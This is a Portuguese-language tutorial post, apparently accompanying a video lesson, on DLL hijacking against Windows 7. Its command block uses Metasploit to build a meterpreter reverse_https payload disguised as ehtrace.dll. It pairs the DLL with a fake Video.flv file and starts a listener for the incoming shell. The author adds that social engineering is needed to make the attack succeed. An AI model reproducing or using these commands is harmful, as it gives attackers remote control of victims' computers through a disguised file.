Dll Hijacker em Windows 7

Nessa aula vou mostrar a técnica de dll hijacker, ela consiste em colocar ou substituir uma dll padrão do sistema operacional por uma dll  maliciosa. Uma vez que a dll maliciosa tenho sido modificada, e necessário que ela esteja na mesma pasta do arquivo vulnerável ou substituída o arquivo original na maquina alvo, essa falha e antiga e já vem sendo discutida a mais de 10 anos. Não vou alongar muito o texto, caso queiram saber mais informações, leia as referencias abaixo. 
Nesse link você vão pode encontrar uma lista de DLL´s vulneráveis e seus respectivos programas:
http://www.exploit-db.com/dll-hijacking-vulnerable-applications/
Na vídeo aula, crio uma dll maliciosa e um aquivo de vídeo  falso. Fiz de forma simples, não deixei a dll  oculta para o melhor entendimento da vídeo, mas para esse ataque se bem sucedido deve envolver um pouco de engenharia social.


Comandos:

1 2 3 4 5 6 7

msfpayload windows/meterpreter/reverse_https LHOST=IP LPORT=443 D > /Diretório para ser salvo o arquivo/ehtrace.dll touch Video.flv use multi/handler set lhost IP set lport 443 set payload windows/meterpreter/reverse_https exploit -j

Sobre a aula:
Tamanho: 69 Mb
Formato: AVI
Duração: 4:29
Musica: Hip-Hop – Hot shif once again
Baixar: http://www.4shared.com/file/yqv2OQRJ/Dll-hijacker_Windows_7_.html
On line: http://vimeo.com/17250307
Dll Hijacking em Windows 7

REF:
http://en.wikipedia.org/wiki/DLL_Hijacking
http://www.exploit-db.com/dll-hijacking-vulnerable-applications/
http://en.wikipedia.org/wiki/Dynamic-link_library
http://blog.metasploit.com/2010/08/exploiting-dll-hijacking-flaws.html
http://www.rec-sec.com/2009/05/12/dll-hijacking-vulnerability/
http://www.informationweek.com/news/windows/security/showArticle.jhtml?articleID=228200659